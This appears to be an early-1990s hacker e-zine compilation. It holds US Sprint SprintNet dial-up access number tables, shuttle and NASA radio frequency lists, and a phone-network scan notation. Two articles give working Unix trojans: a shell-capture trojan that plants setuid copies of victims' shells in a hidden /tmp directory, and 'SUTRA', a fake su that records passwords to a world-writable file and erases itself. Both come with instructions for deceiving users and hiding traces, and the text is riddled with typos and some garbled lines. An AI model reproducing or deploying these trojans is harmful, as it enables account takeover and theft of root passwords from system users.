NM 505 Santa Fe              473-3403                                C
NY 518 Albany                465-8444            465-8632            B
NY 607 Binghamton            772-6642            772-9526            B
NY 716 Buffalo               847-1440            847-1825            B
NY 516 Deer Park             667-5566            243-1105            B
NY 516 Hempstead             292-3800            485-3380            B
NY 607 Ithaca                277-2142            272-9980            C
NY 212 New York City         741-8100            645-0560            A
NY 212 New York City         741-4950            645-0560            A
NY 212 New York City         620-6000            645-0560          A
NY 716 Niagara Falls         282-1462            282-3284            C
NY 518 Plattsburgh           562-1890                                C
NY 914 Poughkeepsie          473-2240            473-3200            B
NY 716 Rochester             454-1020            454-5730            B
NY 315 Syracse              472-5583            479-5445            B
NY 315 Utica                 797-0920            797-0228            B
NY 914 White Plains          328-9199            682-3505            B
NC 704 Asheville             252-914            252-0133            B
NC 704 Charlotte             332-3131            333-6204            A
NC 919 Fayetteville          323-8165            323-4148            C
NC 704 Gastonia              865-4708                                B
NC 919 Greensboro            273-2851            275-1251            
NC 919 High Point            889-7494                                B
NC 919 North Wilkesboro      838-9034            838-1663            C
NC 919 Raleigh               834-8254            834-8254            B
NC 919 Res Tri ark          549-8139            541-9096            B
NC 919 Tarboro               823-0578                                C
NC 919 Wilmington            763-8313            251-8900            C
NC 919 Winston-Salem         725-2126            777-0312            B

Additional Local Access from North Carolna
Local access is also available in many areas from BellSouth Advanced
Networks (BSAN) via PulseLink.  For local access telephone numbers
and sign-on procedures, contact BSAN Customer Service at1-800/NCC-BSAN

ND 701 Fargo                 235-7717            235-9069            C
ND 701 Grand Forks           775-7813                                B
ND 701 Mandan                663-2256            663-6339            B
OH 216 Canton                452-0903            452-6642            B
OH 513 Cincinnati            579-0390            241-8008            A
OH 216 Cleveland             575-1658            771-6480            A
OH 614 Columbus              463-9340            461-9044            A
OH 513 Dayton               461-5254            461-0755            B
OH 216 Elyria                322-8712            322-8645            C
OH 419 Findlay               422-8188            422-8188            B
OH 513 Hamilton              863-4116                                B
OH 216 Kent                  678-5115            678-5043            A
OH 216 Lorain                960-1771                                C
OH 419 Mansfield             526-0686                                C
OH 419 Sandusky              627-0050                               B
OH 513 Springfield           324-1520                                C
OH 419 Toledo                255-7881            255-1906            B
OH 216 Warren                394-0041                                C
OH 216 Wooser               264-8920                                B
OH 216 Youngstown            743-1296            743-6843            B

Additional Local Access from Ohio
Local access is also available in many areas from Ohio Bell via the
Ameritech Packet Switched Nework.  For local access information,
contact Ameritech at 1-800/242-8580 ext. A75.

OK 918 Bartlesville          336-3675                                B
OK 405 Lawton                353-0333            353-0225            B
OK 405 Oklahoma City        232-4546            232-9513            B
OK 405 Stillwater            624-1112            743-1447            B
OK 918 Tulsa                 584-3247            587-2774            B
OR 503 Corvallis             754-9273            754-0559            C
OR 503 Eugene                683-1460            342-6626           C
OR 503 Hood River            386-4405                                C
OR 503 Klamath Falls         882-6282            882-6282            B
OR 503 Medford               779-6343            773-7601            B
OR 503 Portland              295-3028            241-0496            A
OR 503 Salem                 378-7712            378-1660            B

Additional Local Access from Oregon
Local access is also available in many areas via US WEST's packet
switched netwok Digipac.  For local access telephone numbers and
sign-on procedures, contact US WEST Marketing at 303/965-7012.

PA 215 Allentown             435-3330            770-1405            B
PA 814 Altoona               949-0310         `H$h
PA 717 Carlisle              249-9311                                C
PA 717 Danville              271-0102                                C
PA 814 Erie                  899-2241            453-3793            B
PA 412 Greensburg            836-4771            836-4771            B
PA 717 Harrisburg            236-882            236-2007            B
PA 814 Johnstown             535-7576            536-3630            B
PA 215 King of Prussia       337-4300            337-2850            B
PA 717 Lancaster             295-5405            295-7128            C
PA 215 Levittown             946-3469            946-3469            B
PA 412 Monroeville           856-1330            856-1330            B
PA 215 Philadelphia          574-9462            574-0990            A
PA 412 Pittsburgh            288-9950            471-6430            A
PA 412 Pittsburgh            288-9974            471-6430            A
PA 215 Reading               376-8750            375-6945            C
PA 717 Scranton              961-5321            961-5480            B
PA 814 State College         231-1510                                C
PA 215 Warrington            343-6010            343-6010            B
PA 215 West Chester          436-7406            436-7406            B
PA 717 Wilkes-Barre          829-3108            824-8209            B
PA 717 Williamsport          494-1796                                C
PA 717 York                  846-6550            843-0039            B

Additional Local Access from Pennsylvania
Local access is also available in many areas from Bell of Pennsylvania
via Bell Atantic's Public Data Network.  For local access telephone
numbers and sign-on procedures, contact Bell Atlantic at 1-800/

RI 401 Providence            751-7912            831-3990            B
RI 401 North Kingston        295-7100            295-7100           B
RI 401 Woonsocket            466-4566            466-4566            B
SC 803 Charleston            722-4303            577-4710            B
SC 803 Columbia              254-0695            252-0328            B
SC 803 Greenville            233-3486            271-0231            B
SC 803 Spartanburg           585-1637                                B

Additional Local Access from South Carolina
Local access is also available in many areas from BellSouth Adanced
Networks (BSAN) via PulseLink.  For local access telephone numbers
and sign-on procedures, contact BSAN Customer Service at 1-800/NCC-BSAN

SD 605 Pierre                224-0481            224-2257            B
SD 605 Rapid City            348-2621                               C
SD 605 Sioux Falls           336-8593            336-6438            B
TN 615 Bristol               968-1130            968-2480            C
TN 615 Chattanooga           756-1161            265-7929            B
TN 615 Clarksville           55-0032                                B
TN 615 Johnson City          282-6645                                C
TN 615 Knoxville             523-5500            521-5072            B
TN 901 Memphis               521-0215            527-5175            B
TN 615 Nashville             244-3702            255-2608           B
TN 615 Oak Ridge             481-3590                                C
TX 915 Abilene               676-9151                                B
TX 806 Amarillo              373-0458            373-1833            B
TX 903 Atens                677-1712                                C
TX 512 Austin                928-1130            929-3622            B
TX 512 Brownsville           542-0367            544-7073            C
TX 409 Bryan                 822-0159                                C
TX 512 Corpus Christi        884-9030            884-6946            B
TX 214 Dallas                748-6371            745-1359            A
TX 817 Denton                381-1897            381-1897            C
TX 915 El Paso               532-7907            541-1931            B
TX 817 Ft Worth              332-4307            332-6794            A
TX 409 Galveston             762-4382            765-7298            B
TX 713 Houston               227-1018            227-8208            A
TX 512 Laredo                724-1791                                C
TX 903 Longview              236-4205                                C
TX 806 Lubbock               747-4121            765-9631            C
TX 512 McAllen               686-5360            686-2452            B
TX 915 Midland               561-9811            561-8597            B
TX 409 Nederland             722-3720            727-4090            B
TX 915 San Angelo            944-7621            949-1231            B
TX 512 San Antonio           225-8004            225-3444            B
TX 903 Sherman               893-4995                                B
TX 817 Temple                773-9723                                C
TX 903 Tyler                 597-8925                                C
TX 512 Victoria              572-3197            572-3197            B
TX 817 Waco                  752-9743           752-2681            C
TX 817 Wichita Falls         322-3774                                B
UT 801 Logan                 752-3421            752-3421            B
UT 801 Ogden                 627-1630            627-1640           C
UT 801 Provo                 373-0542            375-2084            B
UT 801 Salt Lake City        359-0149            359-0578            B

Additional Local Access from Utah
Local access is also available in many areas via US WEST's packet
switced network, Digipac.  For local access telephone numbers and
sign-on procedures, contact US WEST Marketing at 303/965-7012.

VT 802 Burlington            864-0808                                B
VT 802 Montpelier            229-4966            223-075            B
VT 802 Rutland               775-1676                                C
VT 802 White River Junction  295-7631                                C
VA 703 Blacksburg            552-9181                                C
VA 804 Charlottesville       977-5330                                C
VA 70 Covington             962-2217                                C
VA 703 Fredericksburg        371-0188                                B
VA 703 Harrisonburg          434-7121            434-0374            C
VA 703 Herndon               4351800            481-6807            B
VA 804 Lynchburg             845-0010                                C
VA 804 Newport News          596-6600            596-2710            B
VA 804 Norfolk               625-1186            625-2408            B
VA 703 Occoquan              494-0836            494-0836           B
VA 804 Richmond              788-9902            343-4140            B
VA 703 Roanoke               344-2036            344-2404            B

Additional Local Access from Virginia
Local access is also available in many areas from C&P Telephone
Company via Bell Atlantic's Public Data Network.  For local access
telephone numbers and sign-on procedures, contact Bell Atlantic
at 1-800/444-5551.

WA 206 Auburn                939-9982                               B
WA 206 Bellingham            733-2720            733-2873            B
WA 206 Everett               775-9929            774-7466            C
WA 206 Longview              577-5835            577-3992            B
WA 206 Lynwood               774-7466           774-7466            B
WA 206 Olympia               754-0460            786-5066            C
WA 509 Pullman               332-0172            332-0172            B
WA 509 Richland              943-0649            946-2350            B
WA 206 Seattle               625-9612            623-9951            A
WA 509 Spokane               455-4071            838-9065            B
WA 206 Tacoma                627-1791                                B
WA 206 Vancouver             693-6914                                B
WA 509 Wenatchee            663-6227            663-9180            B
WA 509 Yakima                575-1060                                B

Additional Local Access from Washington
Local access is also available in many areas via US WEST's packet
switched network, Digipac.  For local access telephone numbers and
sign-on procedures, contact US WEST Marketing at 303/965-7012.

WV 304 Charleston            345-6471            345-7140            B
WV 304 Clarksburg            622-6827            622-6827            B
WV 304 Huntington            523-2802                                C
WV 304 Morgantown            292-0104            292-0492            C
WV 304 Wheeling              233-7732                                B
WI 608 Beloit                362-527                                B
WI 715 Eau Claire            836-9295            836-0097            C
WI 414 Green Bay             432-2815            432-0346            B
WI 414 Kenosha               552-9242                                C
WI 608 La Crosse             784-0560                                B
WI 608 Madison               257-5010            257-8472            B
WI 414 Milwaukee             271-3914            278-8007            A
WI 414 Neenah                731-0620            731-1560            C
WI 414 Racine               632-6166            632-2174            C
WI 414 Sheboygan             452-3995                                C
WI 715 Wausau                845-9589                                B
WI 414 West Bend             334-2206                                B

Additional Local Access from Wisconsin
Local access is also available in many areas from Wisconsin Bell via
the Ameritech Packet Switched Network.  For local access information,
contact Ameritech at 1-800/242-8580 ext. A75.

WY 307 Casper                265-5167            265-8807            C
WY 307 Cheyenne              638-4421            637-3958            B
WY 307 Laramie               721-5878                                C

(1) Service is provided by Alascom, Inc. via Alaskanet, which is
  restricted to collect call access to U.S. hosts connected to
   the SprintNet network.  If prepaid access is required, contact
   a US Sprint representative.  For sign-on information, call
   Alascom Customer Service at 907/264-7391 (inside Alaska) or
   1-800/44-2233 (outside Alaska).

(2) International data rates apply.

* An asterisk indicates a change in number, a service upgrade or a
 new location.  Refer to the 'New' listing for further explanations
 of these changes.


                            V.32 9600           V.29 9600
ST AC     CITY                  BPS                 BPS            CLASS
In-WATS 800                  546-2500            546-2000            -

AZ 602 Phoenix               254-1903            254-0040            A
CA 213 Los Angeles           937-5526            937-0233            A
CA 415 San Francisco         956-2256            956-6317           A
CO 303 Denver                745-3285            337-3304            A
DC 202 Washington            659-2733            429-9145            A
FL 305 Miami                 358-5349            372-9684            A
GA 404 Atlanta               688-1212           523-5512            A
IL 312 Chicago               938-5462            938-4401            A
LA 504 New Orleans           524-7442            524-7337            A
MD 301 Baltimore                                 727-2044            A
MA 617 Boston                338-0002            292-9522            A
MI 313 Ann Arbor                                 996-0035            A
MI 313 Detroit               965-3011            964-3133            A
MN 612 Minneapolis           332-0033            341-0324            A
MO 816 Kansas ity           421-5783            221-9407            A
MO 314 St Louis              421-1376            421-0872            A
NJ 201 Newark                624-8843            623-0900            A
NJ 609 Princeton                               799-0244            A
NY 212 New York City         206-0256            633-1117            A
NC 704 Charlotte             332-4023            332-3705            A
OH 513 Cincinnati            579-1593            579-1583            A
OH 216 Cleveland             575-0811            575-1308            A
OH 614 Columbus              461-8671            463-9110            A
OH 216 Kent                                      678-6774            A
OR 503 Portland              295-0337            295-2936            A
PA 215 Piladelphia          629-1172            574-0094            A
PA 412 Pittsburgh            281-8326            281-8782            A
TX 214 Dallas                653-0840            748-3541            A
TX 817 Ft Worth                                  332-8424            A
TX 713 Houston               228-0705            227-1760            A
WA 206 Seattle               625-0860            625-9008            A
WI 414 Milwaukee             271-2420            271-2238            A

                  DOMESTIC X.25 DIAL SERVCE

 - for asynchronous, SDLC, 3270 BSC, and 2780/3780 applications
 - at 1200 and 2400 bps
 - with built-in local error protection
 - from locations nationwide

X.25 Dial Service sends your data in the enhanced X.25 proocol
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In-WATS Service    Telephone Number
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Consult the Data Network Rate Schedule for In-WATS pricing.

Domestic Service Requirements
SPEED:           MODEM TYPE:
1200 bps         Bell 212A compatible
2400 bps         V.22 bis compatible

ST   AC   CITY                     BPS                   CLASS
AL   205  Birmingham             251-7619                  B
AZ   602  Phoenix                271-4467                  A
CA   818  Glendale               246-8480                  B
CA   213  Los Angeles            622-4913                  A
CA   916  Sacramento            446-9811                  B
CA   619  San Diego              236-0733                  B
CA   415  San Francisco          397-0815                  A
CA   408  San Jose               294-9129                  B
CA   714  Santa Ana              648-0311                  B
CO   303  Denver               745-1580                  A
CT   203  Hartford               549-5498                  B
DC   202  Washington             857-0781                  A
FL   305  Miami                  374-1775                  A
FL   407  Orlando                98-3669                  B
FL   813  Tampa                  229-6714                  B
GA   404  Atlanta                688-4650                  A
IL   312  Chicago                781-0961                  A
IN   317  Indianapolis           293-3273                  B
IA   515  Des Moines             288-6529                  B
LA   504  New Orleans            592-8673                  A
MD   301  Baltimore              783-5079                  A
MA   617  Boston                 292-9572                  A
MI   313  Detroit               961-2922                  A
MN   612  Minneapolis            338-3327                  A
MS   601  Jackson                354-2795                  B
MO   314  St Louis               436-2919                  A
NJ   201  Newark                 624-9463                  A
NY   516  Hempstead              565-5751                  B
NY   212  New York               645-3500                  A
NC   704  Charlotte              373-1589                  A
NC   919  Res Tri Park           549-8115                  B
OH   513  Cincinnat             241-0831                  A
OH   216  Cleveland              771-0228                  A
OH   614  Columbus               221-6319                  A
OK   405  Oklahoma City          235-9648                  B
OR   503  Portland               226-0866                  A
PA   215  King of Prussia        265-8060                  B
PA   215  Philadelphia           922-6170                  A
PA   412  Pittsburgh             281-7815                  A
RI   401  Providence             274-1780                  B
TN   615  Nashville            242-1762                  B
TX   214  Dallas                 749-5078                  A
TX   713  Houston                227-2931                  A
UT   801  Salt Lake City         355-2414                  B
VA   804  Norfolk               626-0018                  B
VA   804  Richmond               644-0101                  B
WA   206  Seattle                343-2862                  A
WI   414  Milwaukee              271-0113                  A


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1200 bps         V.22 compatible
2400 bps         V.22 bis compatible
9600 bps         CCITT V.32 compatibl

COUNTRY       CC   CITY            300/1200 BPS    2400 BPS    9600 BPS
France        01   Paris             6928-0404     6928-0404   6928-0404
Japan         52   Nagoya            951-9741      951-9741
Japan         06   Osaka             365-9188      365-9188
Japan         03 * Tokyo             3794-6381     3794-6381
Netherlands   17   Amsterdam         19-46370      19-46370    19-46370
Switzerland   31   Bern              261-049       261-049     261-049
U.K.          71  London            973-1030      973-1030    973-1030

* An asterisk indicates a change in number, a service upgrade or a
 new location.  Refer to the 'New' listing for further explanations
 of these changes.


Please check back to this listing regularly for updates on new
SprintNet Access Centers, upgrades and number changes.  Items will
remain on this listing for 2 months.

COUNTRY    DATE     CODE   ACCESS CENTER    300/1200/2400 BPS #  CLASS
Japan     1/1/91    (03)   Tokyo                3794-6381         n/a

                    DOMESTIC AREA CODE CHANGES
    EFFECTIVE  AREA                         300/
ST     DATE     CODE    ACCESS CENTER      1200 BPS   2400 PS   CLASS
NJ    6/8/91    (908)   Freehold           780-5030   780-9122     B
NJ    6/8/91    (908)   New Brunswick      745-2900   745-7010     B
NJ    6/8/91    (908)   Rahway            815-1885                B
NJ    6/8/91    (908)   Redbank            571-0003                B
NJ    6/8/91    (908)   Sayreville         525-9507                B
NJ    6/8/91    (908)   Summit             273-9619   273-9619     B
TX    11/4/90   (903)   Athens             677-1712                C
TX    11/4/90   (903)   Longview           236-4205                C
TX    11/4/90   (903)   Sherman            893-4995                B
TX    11/4/90   (903)   Tyler              597-8925                C


For more information on SprintNet data network products and services,
please call toll-free 1-800/736-1130.

              Thank you for using US Sprint's Online
            Local Access Telephone Numbers Directory


                       []                            []
                       [] Unix, Shell apture Trojan  []
                       []                            []
                       []             By             []
                       []                            []
                       []            Trax            []
                       []                            []

  Here is an example of a trojan I wrote that copies the shell of the user who
runs it then runs another program. When i had it in my /tmp directory i had
several people run it and thus got access to their account.
This is how it works.

First make a directory in the systems /tmp directory. But make it one that is
hrd to get into. Such as.	 [ or /usr/spool/uucppublic - Editor ]

%mkdir /tmp/'.. '
%chmod go-rx /tmp/'.. '
%chmod a+w /tmp/'.. '

The next time a user is in the /tmp and tries to cd .. it won't work, you'll
have to cd '.. ' which isn't an obvious thing to do. Also if your not looking
or it there is a good chance they'll miss it all together.
The chmod's also help in that the trojan will write to /tmp/'.. ' but no other
users can read it.

Now here is the source.
------Cut Here------
#include <stdio.h>

      system("echo > /tmp/'.. '/.$USER.tmp");		[ On some systems
      system("chmod 6777 /tmp/'.. '/.$USER.tmp");	  $USER is not set
      system("Full path of real program");		  - Editor ]

------Cut Here------

Now compile the source and make sure you hve an iteresting program that other
users will want to run. Then chmod the program as such.

%chmod a+x a.out
%chmod a-wr a.out

This will stop the user from using 'strings a.out' which will show the trojn
code. Now do.

%mv a.out program

Put this in an obvious place so that you can get users to run it. The best
types of programs are games. I had a program called lastlog which showed a list
of all the users and when they where last on that system. The real program was
in my home directory and the trojan would run it after it copied the users

Now in your /tmp/'.. ' directory you'll have something like this when a user
has run your trojan.

%ls -al /tmp/'.. '
total 2
drwx-w--w-  2 trojan        512 Feb 31 10:54 .
drwxrwxrwx  3 root          512 Feb 31 10:54 ..
-rwsrwsrwx  1 root            0 Jun 29 12:12 .root.tmp

Now in it's present state .root.tmp is pretty useless so edit it and put the 
following lines in it.

#!/bin/sh	[ This won't work if your effective group is differant to that
 if the fil you are trying to write to. If it is differant,
 you will find the SUID bits removed. But if the group is
 the same then it's not a bad idea to do it like this, because
 COPS looks for SUID files with the magic "#!/bin/sh" - so if
 you leave the SUID file empty till you wan to use it, it
 not be as noticeable - Editor ]

[ also, note that "csh" will refuse to work under SUID, it has
 to be "sh" or "zsh" or "ksh" (see the letters section)
 - Editor ]

Now everytime you run that shell your that user, and if that user is root then
your got total control of the system with just an 18 byte file.

Thanks to Hvee and Prime who in one way or another helped me put together these


               * * * * * * * * * * * * * * * * * * * * * * * *
               *                                             *
               *  Shuttle/NASA/UAF Communication Frequencies *
               *                                             *
               *                      By                     *
               *                                             *
               *   Ron Parise, ASTRO-1 Shuttle Astronaut     *
               *                                            *
               * * * * * * * * * * * * * * * * * * * * * * * *

                             [ Obtained by Hvee ]

    This is in response to the question about shuttle frequencies. I tried
to reply the other day but apparetly it didn't work. The space shuttle
transmits on three frequency bands, UHF, S-Band, and Ku-Band.
The UHF frequencies are simple AM voice and very easy to copy. These
frequencies are used for launch and landing operations, EVA comunications,
(i.e. fro the spacesuits back and forth to the shuttle), and as an additional
voice downlink when other channels are in use or the current ground station
has no S-Band capability. The frequncies in use are:

                296.8 MHz - air to ground, or orbiter to suit
                259.7 MHz - air to ground, or suit to orbiter
                279.0 MHz - suit to orbiter or suit to suit
                243.0 MHz - standard Mil aircraft emergency freq.

    The S-Band system is one of the primary orbiter downlink bands. The voice
chanels are digital slope delta modulation and are mux'ed in with the
rest of the orbiter telemetry, very difficult to copy. Much of the
downlink TV is on S-Band also but it is wideband FM and should be
easily copyable. The frequencies are:

                2287.5 MHz - primary digital downlink
                2250.0 MHz - wideband FM with either main engine analog
                             telemetry during launch, or TV during orbit

    The Ku-Band system is used in conjunction with the tracking and data
relay satellites and is used much more heavily in Spacelab flights than in
others. The data is *very* high rate digital (50 Mbits/sec range) and
therefore essentially impossible for you to demodulate and decommutate
in your basement. Nevertheless the shuttle transmits on 15.003GHz. You
should also note howver that these transmissions are directed toward
the TDRS satellite with a high gain antenna and would therefore not be
copyable on the ground.

    The UHF frequencies are fun to listen to but are not heavily used
excep during EVA's. You will almost always hear some activity on them
however sometime during a mission but you just have to be patient.

Happy Listening!


Other Frequencies of interest:

USAF/NASA Frequencies
4.510 MHz   9.974 MHz
4.760 MHz  10.780 MHz
4.855 MHz  11.104 MHz
4.992 MHz  11.414 MHz
5.350 MHz  11.548 MHz
5.810 MHz  14.615 MHz
6.727 MHz  19.303 MHz
6.740 MHz  19.984 MHz
8.993 MHz  20.191 MHz
9.315 Hz  20.475 MHz


Search/Rescue (Aircraft) : 164.800 MHz
             (Ships)    : 148.500 MHz, 149.100 MHz, 162.000 MHz

S-Band Microwave
Air-to-Ground : 2205.0, 2217.5, 2250.0, 2287.5 MHz
Ground-to-Air :2041.9, 2201.4 MHz

NASA Aeronautical Frequencies VHF/UHF in MHz

117.8         118.4           116.4
121.7       121.7           120.7
126.2         125.1           121.8
126.3         126.2           126.1
284.0         128.7           127.8
138.3         236.6
138.45        269.9
149.925       290.3
162.6120      318.1
273.5         390.1

KSC Ground Support VHF in MHz
148.480    163.510    170.350
149.170    163.560    171.150
162.610    165.190    171.260
163.460    170.150    173.560
163.480    170.170    173.680

NASA Malabar (Palm Bay)         HF Networks (in KHz)
2405  Data Buoys                       2622  SRB Recovery (Primary)
2664  Backup Mission Audio-Cape/Hou    2678  ETR ange Control
2716  Navy Harbor Cntl-Port Canav.     2764  SRB Recovery Channel
3024  Coast Guard SAR (Primary)        3187  SRB Recovery Ships Channel
4376  Primary Recovery Zone SAR        4510  SRB Recovery Ships Channel
4856  Cape Radio/Leader               4992  Cape Radio/Coast Guard Ships
5180  NASA Tracking Ships              5187  NASA Tracking Ships
5190  ETR Primary Night Channel        5350  Launch Support Aircraft
5680  Launch Support Ships             5810  ETR Secondary Night Channel
6720  SAR Primary Atlantic             6896  Cape Radio
637  Cape Radio                       7412  SAR Communications with Bahamas
7461  Cape Radio/Launch Support A/C    7525  NASA Ground Tracking Net
7676  Launch Support Aircraft          7765  SRB Recovery Ships
7919  Data Channel                    7985  Data Channel
9022  Launch Support Aircraft          9043  Launch Support Aircraft
9132  Launch Support Aircraft         10305  Space Missile Tactical Net
10310  Malabar-to-Ascension Is-MUX     10780  ETR Primary Day Channel
11104  Launch Support Ships            11252  Launch Support Ships
11407  SRB Recovery Ships              11414  Cape Radio
11548  Cape Radio                      11621  SRB Recovery Ships
13227  Launch Support Aircraft         13237  Data Channel
13495  Data Channel                    13600  Malabar-to-Ascesion Is-MUX
13878  Launch Support Aircraft         14937  Ascension Is-to-Malabar-MUX
18009  Launch Support Ships            19303  Launch Support Ships
19640  Cape Radio                      19966  Ascension Is-to-Malabar-MUX
20186  Launch Tracking Net             20192  Malabar-to-Ascension Is-MUX
20198  OCC Shuttle Mission Audio       20390  ETR-Secondary Day Channel
22755  Ascension Is-to-Malabar-MUX     23413  Cape Radio
27065  NASA CB Radios


                    ()                                  ()
                    () "SUTRA" - a Unix SU trojan horse ()
                    ()                                  ()
                    ()                By                ()
                    ()                                  ()
                    ()        The Chthonic Hvee         ()
                    ()                                  ()

  This is probably the most successful trojan horses I have ever created. It
is also one of the very few ways of actually obtaning the root password, as
apposed to granting oneself root privileges.

  To install SUTRA:	Hack an account of which the user uses "su", or
an account which can write to an elemant of the users
PATH before /bin/su is executed.

Edit the PATHSU efine to refect where you are actually
installing it.

Upload and compile SUTRA with "cc -o su sutra.c
-lcurses -ltermcap", then move the trojan su into
the targets path. Make it world writeable.

If you are installing SUTRA into (say) ~/bin remember
to edit the tagets ".cshrc" or ".profile" so the exec
gets to the trojan before it finds the real su.

Clean up your footprints and leave the system alone
for a few days.

 Hopefully at some time during the interum your target will have tried to su,
andthus called up our little trojan.

 Which does this:	"Password:"
After the trojan obtains the password, it appends the
first argument (in case the person was not suing to
root, but rather another user) and the password to
the RESULTS file. This file is given a i_mode of 666.
SUTRA then deletes itself, pauses a second, and prints
"Sorry" to the tty.

The target at this point will usually assume they have
incorrectly typed the root password. Some will suspect
their security has been breached, but when the target
tries SUing again, it will appear as if there never
was such a problem - for SUTRA has deleted itself. If
they look at /var/adm/pact (lastcomm) it will show

- Hvee


Some systems do not have flock() - and lock an executable when it is
executed. So you will need to do this....

% cat >su
/full/path/su2 $1
rm -f /full/path/su
rm -f /full/path/su2
% chmod 777 su
% cc -o su2 sutra.c -lcurses -ltermcap
% chmod 777 su2
% rm sutra.c
% logout

----------------------------------> sutra.c <----------------------------------
/* SUTRA by TCH/IS July 1991
* compile: cc -o su sutra.c -lcurses -ltermcap

#include <stdio.h>
#include <curses.h>
#include <fcntl.h>
#include <sys/file.h>

#define PATHSU "/home/usr/admin/bin/su"	/* Path to THIS program */
#define RESULTS "/usr/spool/uucppublic/.rp"	/* Results file */
#define SLEEPTIME 1	/* So we "feel" like /bin/su */

int argc;
char *argv[];
char name[20], password[20];
FILE *fp, *fopen();
initscr();		/* init curses */
endwin();		/* kill curses */

if ( ( fp = fopen(RESULTS,"a" )  != -1 ) {
       fprintf(fp,"login %s has password %s\n",argv[1],password);
chmod(RESULTS,438);	/* i.e -rw-rw-rw */
flock(open(PATHSU,O_RDONLY),LOCK_UN);	/* Some systems lock a file while it
  is running - which means the
  unlink() would fail */

unlink(PATHSU);			/* remove the trojan */
sleep(SLEEPTIME);		/* you may need to change this to usleep(3) */
printf("Sorry\n");		/* lets rap it up */

----------------------------------> Cut Here <---------------------------------


                    {} The Standed Hvee Listing formats {}
                    {}                                  {}
                    {}  .        Introduction        .  {}
                    {}      .                    .   *. {}
                    {} .   .  .       By        .  .    {}
                    {}  *    .                 .      . {}
                    {}      . The Chthonic Hvee   .     {}

  "One of These Days" - Meddle/Pink Floyd reverberates within my ear channels
as I write this. It is probably one of the best electric guitar peices ever
created. Anyway, musical notation is a standed - deeloped in the late 16th
centuary by musicians so they could record, visualise, extrapolate and most of
all propergate music to one another. Now while one would be hard pressed to
notate the entireity of something like "One of These Days", you could obtain
the base fundementals - and WRITE THEM DOWN.

  So what the hell is your point Hvee? Well, basicaly any formal system
contains truths about its objects which can never be expressed under that
formal system (Godel) :-). Well basicaly any standed that is created can never
exprss everything you want to express within that standed, but lets face it,
you would be pretty fucked without it. And that my friend is the state of
standeds within in the hacking/phreaking community - fucked. Obtaining any sort
of relevant useful infrmation from someones "Scan" is a bloody nightmare;
Hence we have the "Hvee Standed" (Err just a touch on the egocentric side Hvee
- Editor)

  So far I have two subsets of this "Hvee Standed" - they are the "Hvee PTSN
Standed", and the "Hvee InterNet Standed". The next two files concern them
and their impimentation. If you have any additions and or comments please
inform me, I don't want all this work to go Espranarto on me.

 A few weeks ago, I made a "Hvee NUA standed", which subsequently went black
hole exploring...sigh. Maybe next editin.

- Hve


                    {} The Standed Hvee Listing formats {}
                    {}                                  {}
                    {}  .  Part#1 - The PTSN format  .  {}
                    {}      .                    .   *. {}
                    {} .   .  .        By       .  .    {}
                    {}  *    .                 .      . {}
                    {}      . The Chthonic Hvee   .     {}

   PTSN stands for "Public Telephone Switching Network". Quite deffinatly the
biggist network in the world with over a billion connections (obviously). I am
constantly annoyed at my brains non-ability in the area of eidetic recall. If
you have ever done any drawing from memory, you may have noticed how your hand
is guided into the vauge outlines and shapes of thighs, calves or flowers. It
is a little like Newton's method for find roots of equatons? Yes? Conciousness
is an extreamly interesting trait. The fact that YOU can be altered so easily
at the base level is frightening. Being alive seems to be just as I imagined it
would. And it feels? Yeah... it swings from feeling fucked, to feeling fucking
good. Just remember kids, it all ends soon...


  Trax, Prime Suspect and I are collating all our old PTSN scans into my new
format - I hope it shall be ready for the next edition. I am also writing
several C programs at the mment to manage the whole thing - a very easy thing
to do, given the Hvee structure. I am also thinking about writing a mail server
for it, if someone has a legal account I could run it on - please tell me.

   Untill then, just use "awk" e.g

Find all data lines with lastparty releace that were still active in 1991 and
you must use Exchange Mode to get to:

% awk <ptsn_list '$4 ~/LP/&& $4 ~/DL/&& $3 ~/XM/&& $2 ~/1991/'

Powerful isn't?

Please tell me if you think I have missed any USEFULL keys and I'll iclude
them next edition.

- Hvee

              |Feild seperator.
              |      |The last update of this information.
              |      |
              |      |       |Feild seperator.
              |      |       |
              |      |       |    |How to activate/connect. Cf key.
              |      |       |    |
              |      |       |    |     |Feild seperator.
              |      |       |    |     |
              |      |      |   |     |   |Discribes PTSN type. Cf key.
              |      |       |    |     |   |
| |  |   |  |                                     |     |        |
| |  |   |  |Special number.                      |     |        |More comments
| |  |   |                Where [] defines an     |     |
| |  |   |Digits follow.  optional parameter,     |     |Primary comment feild.
| |  |                    and {} defines an       |
| |  |Inclusive between.  optional, optionally    |Feid seperator.
| |                       repedative parameter.
| |Any digit.
|PTSN number.

In the form (country code)-(area code)-(exchange code)-(line).
I know this is not allways possible, but try to stick as close
as possible to it. If the PTSN is so small it doesn't activate
the correct TAB seperator, then add enough spaces to the end
of it untill it does.

In the format "yyyy.mm". "yyyy" because  hope these stupid
listings will be about in 9 years time.

SD = Standed (or just leave blank).
XM = Exchange mode - i.e CCITT V - usually from within an ARF,
    ARE, ARE-11. AXE's use CCITT V for interexchange
    communication with the above. AXE - AXE communication is
    packetswitched. Most ARFs, AREs and ARE-11s can be dropped
    into XM.
26 = U.S operator tones.
MF = MFC tones.
CC = CCS tones.
FC = From Country - using normal routing you can only connect
    from within the country code. e.g 008 and 80 numbers.
FA = As above, but also only from that current area code.
FE = As above, but also only from other exchanges in the same
    building (zone).
FX = As above, but also only from that particular exchange.
AM = Amplification of signal needed. I.e high drain loops.
LD = Loop dissconnect dialing.
OD = Over Dial = Keep sending routing information untill you
    have a connection.
TT = Special Tones. More information in comment feild.
TS = TASI tones.
      ~xx = NOT xx. e.g ~FE
     ~~xx = NOT NOT xx = xx. e.g ~~OD = OD (don't ask why).
    xx|yy = xx OR (exclusive) yy e.g FX|XM
    xx&yy = xx AND yy = xxyy. e.g TTXM
() = Operations ordering. e.g FX|(TTLD)

SD = Standed (or just leave blank).
NA = No anwser.
DD = Deaf and Dumb.
## = Not connected, disconnected etc.
DL = Dataline.
SV = Server.
NC = No charging.
NR = Not returned - no connection status is returned to the
    calling exchange, so there is no-charge. Most loops and
    fault numbers are in this catagory - so is a unanwsered
    line. The calling exchange will normally dissconnect in 90
    seconds unless a connection is returned, that is why Black
    Boxes only work for 90 seconds in Australia. XM will
    normally get you around this.
DT = DTMF controlled. e.g a VMB.
VM = Voice Mail box.
LP = Last Party release. If you see this, and plan to do
    anything nice and socially deviant, make sure you are going
    through a diverter or trace blocker (e.g XM) of some sort.
    Commenly used with large DL servers to trace back securiety
    breahes when thehacker disconnects.
TR = Red Trace on this line.
XD = Will drop you into exchange mode if possible on your
FT = Forward Tar.
RT = Reversal Tar.
IT = Inward Trunk Line.
